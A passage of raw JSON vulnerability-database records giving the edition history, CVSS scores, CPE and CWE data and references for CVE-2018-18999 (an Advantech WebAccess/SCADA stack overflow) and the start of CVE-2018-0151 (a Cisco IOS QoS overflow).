["cpe:/a:advantech:webaccess\\/scada:8.3.2"], "cpe23": ["cpe:2.3:a:advantech:webaccess\\/scada:8.3.2:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2018-18999"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "cwe": ["CWE-787"], "description": "WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-09-21T14:29:01", "references": [{"idList": ["ICSA-18-352-02"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-09-21T14:29:01", "rev": 2, "value": 5.7, "vector": "NONE"}}, "hash": "53ce6c5fa5a77f20a5dc56fa46fadecd839b9edeefcb736717eaccf45b755cb8", "hashmap": [{"hash": "a72d4a06271d564196c4adb41e9505fb", "key": "cvelist"}, {"hash": "d7c8674dddbaa98c8b01934107d12a98", "key": "cvss3"}, {"hash": "0cbe377edecb0d9dffba99052cf815ef", "key": "cpe"}, {"hash": "6bf328b933d94cc59fc9df9d8ed52744", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "9cb226088d8ed6bc24c0d356d8e65048", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "27005d134e0bd1b9d994dd11ea115611", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "eea8e59ff6d80c6a61d352cf98fdcaa5", "key": "modified"}, {"hash": "87675da2db3f7884144dca63ae049358", "key": "title"}, {"hash": "55ee0f03dabfc86872377884fe2463e1", "key": "cpe23"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "bee62e98e5cbcfc34e40696bc76575a2", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "0f3be16763eae2fc2bb0f47481ae5e5c", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "id": "CVE-2018-18999", "lastseen": "2020-09-21T14:29:01", "modified": "2020-09-18T16:53:00", "objectVersion": "1.3", "published": "2018-12-19T18:29:00", "references": ["http://www.securityfocus.com/bid/106245", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "https://www.tenable.com/security/research/tra-2018-45"], "reporter": "cve@mitre.org", "title": "CVE-2018-18999", "type": "cve", "viewCount": 2}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 3, "lastseen": "2020-09-21T14:29:01"}, {"bulletin": {"affectedSoftware": [{"name": "advantech webaccess/scada", "operator": "eq", "version": "8.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:advantech:webaccess/scada:8.3.2"], "cpe23": [], "cvelist": ["CVE-2018-18999"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "cwe": ["CWE-20"], "description": "WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-10T12:28:46", "references": [{"idList": ["ICSA-18-352-02"], "type": "ics"}], "rev": 2}, "score": {"modified": "2019-10-10T12:28:46", "rev": 2, "value": 5.7, "vector": "NONE"}}, "hash": "15a26f4f6c138e9558938032a2e8b828af52df3e6b1ae7c33ac46f3df574b9fb", "hashmap": [{"hash": "e7ff652dddb87cdfb83582ed7538f397", "key": "cvss3"}, {"hash": "a72d4a06271d564196c4adb41e9505fb", "key": "cvelist"}, {"hash": "6bf328b933d94cc59fc9df9d8ed52744", "key": "description"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "fbda243272102904fff31be5286f6e26", "key": "affectedSoftware"}, {"hash": "9cb226088d8ed6bc24c0d356d8e65048", "key": "href"}, {"hash": "3d3e28b8ac774696755a820537cec3a9", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "27005d134e0bd1b9d994dd11ea115611", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b957b53db7220421b1a5496a62a34952", "key": "cpe"}, {"hash": "87675da2db3f7884144dca63ae049358", "key": "title"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "bee62e98e5cbcfc34e40696bc76575a2", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "id": "CVE-2018-18999", "lastseen": "2019-10-10T12:28:46", "modified": "2019-10-09T23:37:00", "objectVersion": "1.3", "published": "2018-12-19T18:29:00", "references": ["http://www.securityfocus.com/bid/106245", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "https://www.tenable.com/security/research/tra-2018-45"], "reporter": "cve@mitre.org", "title": "CVE-2018-18999", "type": "cve", "viewCount": 2}, "differentElements": ["cpe23", "cvss3", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 2, "lastseen": "2019-10-10T12:28:46"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}], "affectedSoftware": [{"cpeName": "advantech:webaccess\\/scada", "name": "advantech webaccess\\/scada", "operator": "eq", "version": "8.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:advantech:webaccess\\/scada:8.3.2"], "cpe23": ["cpe:2.3:a:advantech:webaccess\\/scada:8.3.2:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:advantech:webaccess\\/scada:8.3.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2018-18999"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "cwe": ["CWE-787"], "description": "WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack.", "edition": 5, "enchantments": {"dependencies": {"modified": "2021-02-02T06:52:33", "references": [{"idList": ["ICSA-18-352-02"], "type": "ics"}], "rev": 2}, "score": {"modified": "2021-02-02T06:52:33", "rev": 2, "value": 5.7, "vector": "NONE"}}, "extraReferences": [{"name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02"}, {"name": "https://www.tenable.com/security/research/tra-2018-45", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://www.tenable.com/security/research/tra-2018-45"}, {"name": "106245", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/106245"}], "hash": "de96e2e17ec4e7bff5c1634ebc18d0fbb8af737f21bc52d5ccc11a7121bd672a", "hashmap": [{"hash": "a72d4a06271d564196c4adb41e9505fb", "key": "cvelist"}, {"hash": "d7c8674dddbaa98c8b01934107d12a98", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "0cbe377edecb0d9dffba99052cf815ef", "key": "cpe"}, {"hash": "6bf328b933d94cc59fc9df9d8ed52744", "key": "description"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "cbfc853b5dee3f9d681cd9c39355426d", "key": "affectedConfiguration"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "9cb226088d8ed6bc24c0d356d8e65048", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "5512b2c13fb7202d2647237a8fcb4d83", "key": "cpeConfiguration"}, {"hash": "27005d134e0bd1b9d994dd11ea115611", "key": "published"}, {"hash": "631478eb46f80b82b0d14d737516068d", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "eea8e59ff6d80c6a61d352cf98fdcaa5", "key": "modified"}, {"hash": "87675da2db3f7884144dca63ae049358", "key": "title"}, {"hash": "55ee0f03dabfc86872377884fe2463e1", "key": "cpe23"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "bee62e98e5cbcfc34e40696bc76575a2", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "0f3be16763eae2fc2bb0f47481ae5e5c", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "id": "CVE-2018-18999", "immutableFields": [], "lastseen": "2021-02-02T06:52:33", "modified": "2020-09-18T16:53:00", "objectVersion": "1.5", "published": "2018-12-19T18:29:00", "references": ["http://www.securityfocus.com/bid/106245", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "https://www.tenable.com/security/research/tra-2018-45"], "reporter": "cve@mitre.org", "title": "CVE-2018-18999", "type": "cve", "viewCount": 5}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 5, "lastseen": "2021-02-02T06:52:33"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}], "affectedSoftware": [{"cpeName": "advantech:webaccess\\/scada", "name": "advantech webaccess\\/scada", "operator": "eq", "version": "8.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:advantech:webaccess\\/scada:8.3.2"], "cpe23": ["cpe:2.3:a:advantech:webaccess\\/scada:8.3.2:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:advantech:webaccess\\/scada:8.3.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2018-18999"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "cwe": ["CWE-787"], "description": "WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-10-03T13:20:17", "references": [{"idList": ["ICSA-18-352-02"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-10-03T13:20:17", "rev": 2, "value": 5.7, "vector": "NONE"}}, "extraReferences": [], "hash": "4f7f6a073ec08b15f6f0ddff6f15cd8f0b751b46cfee205e5a8c0f3c6d33370f", "hashmap": [{"hash": "a72d4a06271d564196c4adb41e9505fb", "key": "cvelist"}, {"hash": "d7c8674dddbaa98c8b01934107d12a98", "key": "cvss3"}, {"hash": "0cbe377edecb0d9dffba99052cf815ef", "key": "cpe"}, {"hash": "6bf328b933d94cc59fc9df9d8ed52744", "key": "description"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "cbfc853b5dee3f9d681cd9c39355426d", "key": "affectedConfiguration"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "9cb226088d8ed6bc24c0d356d8e65048", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "5512b2c13fb7202d2647237a8fcb4d83", "key": "cpeConfiguration"}, {"hash": "27005d134e0bd1b9d994dd11ea115611", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "eea8e59ff6d80c6a61d352cf98fdcaa5", "key": "modified"}, {"hash": "87675da2db3f7884144dca63ae049358", "key": "title"}, {"hash": "55ee0f03dabfc86872377884fe2463e1", "key": "cpe23"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "bee62e98e5cbcfc34e40696bc76575a2", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "0f3be16763eae2fc2bb0f47481ae5e5c", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "id": "CVE-2018-18999", "lastseen": "2020-10-03T13:20:17", "modified": "2020-09-18T16:53:00", "objectVersion": "1.3", "published": "2018-12-19T18:29:00", "references": ["http://www.securityfocus.com/bid/106245", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "https://www.tenable.com/security/research/tra-2018-45"], "reporter": "cve@mitre.org", "title": "CVE-2018-18999", "type": "cve", "viewCount": 4}, "differentElements": ["extraReferences"], "edition": 4, "lastseen": "2020-10-03T13:20:17"}, {"bulletin": {"affectedSoftware": [{"name": "advantech webaccess/scada", "operator": "eq", "version": "8.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:advantech:webaccess/scada:8.3.2"], "cpe23": [], "cvelist": ["CVE-2018-18999"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "cwe": ["CWE-20"], "description": "WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:20:01", "references": [{"idList": ["ICSA-18-352-02"], "type": "ics"}]}, "score": {"modified": "2019-05-29T18:20:01", "value": 5.7, "vector": "NONE"}}, "hash": "e2deb57d5f875be07e1d4d4b4f326836c8bef3b2383252476096be90c88d0fe6", "hashmap": [{"hash": "e7ff652dddb87cdfb83582ed7538f397", "key": "cvss3"}, {"hash": "a72d4a06271d564196c4adb41e9505fb", "key": "cvelist"}, {"hash": "6bf328b933d94cc59fc9df9d8ed52744", "key": "description"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "d7a4572e7ed95f6f9e90213439bdee61", "key": "modified"}, {"hash": "fbda243272102904fff31be5286f6e26", "key": "affectedSoftware"}, {"hash": "9cb226088d8ed6bc24c0d356d8e65048", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "27005d134e0bd1b9d994dd11ea115611", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b957b53db7220421b1a5496a62a34952", "key": "cpe"}, {"hash": "87675da2db3f7884144dca63ae049358", "key": "title"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "bee62e98e5cbcfc34e40696bc76575a2", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "id": "CVE-2018-18999", "lastseen": "2019-05-29T18:20:01", "modified": "2019-01-11T16:05:00", "objectVersion": "1.3", "published": "2018-12-19T18:29:00", "references": ["http://www.securityfocus.com/bid/106245", "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "https://www.tenable.com/security/research/tra-2018-45"], "reporter": "cve@mitre.org", "title": "CVE-2018-18999", "type": "cve", "viewCount": 0}, "differentElements": ["modified"], "edition": 1, "lastseen": "2019-05-29T18:20:01"}], "edition": 6, "hashmap": [{"key": "affectedConfiguration", "hash": "cbfc853b5dee3f9d681cd9c39355426d"}, {"key": "affectedSoftware", "hash": "0f3be16763eae2fc2bb0f47481ae5e5c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "0cbe377edecb0d9dffba99052cf815ef"}, {"key": "cpe23", "hash": "55ee0f03dabfc86872377884fe2463e1"}, {"key": "cpeConfiguration", "hash": "6bfa97614539ec5e3f76b33c42e28ca1"}, {"key": "cvelist", "hash": "a72d4a06271d564196c4adb41e9505fb"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "d7c8674dddbaa98c8b01934107d12a98"}, {"key": "cwe", "hash": "661a69d232e07fc7aadb258325e71df8"}, {"key": "description", "hash": "6bf328b933d94cc59fc9df9d8ed52744"}, {"key": "extraReferences", "hash": "631478eb46f80b82b0d14d737516068d"}, {"key": "href", "hash": "9cb226088d8ed6bc24c0d356d8e65048"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "eea8e59ff6d80c6a61d352cf98fdcaa5"}, {"key": "published", "hash": "27005d134e0bd1b9d994dd11ea115611"}, {"key": "references", "hash": "bee62e98e5cbcfc34e40696bc76575a2"}, {"key": "reporter", "hash": "345c97c4bc16e15b8caea3259064e12a"}, {"key": "title", "hash": "87675da2db3f7884144dca63ae049358"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "17f6a6c2c26b9aacd60af0a7470ca9ae0697c378393ea021c9167194e61f0db2", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "ics", "idList": ["ICSA-18-352-02"]}, {"type": "nessus", "idList": ["SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN"]}], "modified": "2021-04-23T00:24:23", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-04-23T00:24:23", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:advantech:webaccess\\/scada:8.3.2"], "affectedSoftware": [{"cpeName": "advantech:webaccess\\/scada", "name": "advantech webaccess\\/scada", "operator": "eq", "version": "8.3.2"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "cpe23": ["cpe:2.3:a:advantech:webaccess\\/scada:8.3.2:*:*:*:*:*:*:*"], "cwe": ["CWE-787"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:advantech:webaccess\\/scada:8.3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02"}, {"name": "https://www.tenable.com/security/research/tra-2018-45", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://www.tenable.com/security/research/tra-2018-45"}, {"name": "106245", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/106245"}], "immutableFields": []}, {"id": "CVE-2018-0151", "bulletinFamily": "NVD", "title": "CVE-2018-0151", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges. The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading. The malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability. Cisco Bug IDs: CSCvf73881.", "published": "2018-03-28T22:29:00", "modified": "2019-12-02T18:54:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "reporter": "psirt@cisco.com", "references": ["http://www.securitytracker.com/id/1040582", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "http://www.securityfocus.com/bid/103540", "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-03"], "cvelist": ["CVE-2018-0151"], "type": "cve", "lastseen": "2021-04-23T00:24:13", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "-"}, {"cpeName": "cisco:ios_xe", "name": "cisco ios xe", "operator": "eq", "version": "16.5.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:cisco:ios_xe:-", "cpe:/o:cisco:ios_xe:16.5.1"], "cpe23": ["cpe:2.3:o:cisco:ios_xe:-:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:ios_xe:16.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2018-0151"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-119"], "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges. The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading. The malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the 